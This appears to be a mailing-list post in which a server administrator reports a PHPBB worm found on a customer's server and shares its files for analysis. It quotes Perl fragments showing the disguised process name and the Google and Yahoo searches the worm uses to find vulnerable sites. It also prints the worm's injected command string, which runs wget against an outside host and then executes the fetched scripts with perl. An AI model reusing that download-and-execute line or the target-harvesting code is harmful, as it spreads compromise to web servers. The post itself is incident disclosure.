Hello, I discovered tonight that a copy of the PHPBB worm had broken in through a script a customer was running and was busy running around googling and generating lists of sites. There have been a couple of intrusions but they appear to be the same version. I thought I'd pass on the files that were on the server in case anyone is interested. The processes that were left running were called: /usr/local/sbin/httpd - spy which is the process name from php.txt: my $processo = "/usr/local/sbin/httpd - spy"; This file contains the component that talks to Google: $procura = 'inurl:*.php?*=' . $numr; for($n=0;$n<900;$n += 10){ $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next; print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n"; and then parses the results for URLs :) It also gets them from Yahoo!: for($cadenu=1;$cadenu <= 991; $cadenu +=10){ @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next; The basis for all of these worms is: $lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt'; I've included copies of these in the tarball so people can look for themselves :) Happy holidays. Colin. -- If jugglers juggle. And Smugglers smuggle. Then what else can a snuggler do :)
Attachment:
phpbbworm.tar.gz
Description: application/tar-gz